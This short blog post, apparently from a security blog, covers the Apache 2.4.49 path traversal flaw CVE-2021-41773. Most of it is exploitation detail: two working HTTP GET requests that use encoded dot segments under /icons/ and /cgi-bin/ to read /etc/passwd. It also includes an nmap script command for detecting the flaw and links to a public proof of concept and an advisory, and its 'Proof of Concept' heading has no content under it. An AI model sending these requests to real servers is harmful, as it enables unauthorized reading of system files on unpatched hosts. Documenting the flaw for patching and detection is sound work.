Posts

Showing posts from October, 2021

Apache-/2.4.49-CVE-2021-41773: Path Traversal Vulnerability

Image
Apache-/2.4.49-CVE-2021-41773: Path Traversal Vulnerability Below are the detals for exploitation of this vulnerability: GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd nmap  script at https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse nmap script=http-vuln-cve-2021-41773.nse <target> Proof of Concept: Reference: https://github.com/blasty/CVE-2021-41773 https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited